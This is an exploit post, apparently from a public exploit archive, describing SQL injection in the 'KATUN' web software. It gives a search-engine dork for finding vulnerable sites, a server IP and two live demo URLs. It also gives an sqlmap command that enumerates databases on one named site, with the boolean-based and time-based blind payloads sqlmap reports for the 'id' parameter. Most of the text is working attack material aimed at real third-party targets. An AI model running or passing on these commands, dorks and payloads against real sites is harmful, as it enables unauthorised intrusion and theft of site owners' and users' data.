# Exploit Title:KATUN SQL Injection
# Date:17.05.2019
# Dork :intext:"2015 KATUN. All rights reserved. "
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux

reverse check bing.com

ip:89.188.43.17 id=

#Demo

http://www.katun.me/gallery.php?id=2
http://www.devcore.ac.me/eng/page.php?id=2


# Poc:

sqlmap -u "http://www.katun.me/gallery.php?id=2"  --random-agent --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: id=-7331 OR MAKE_SET(7965=7965,1895)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---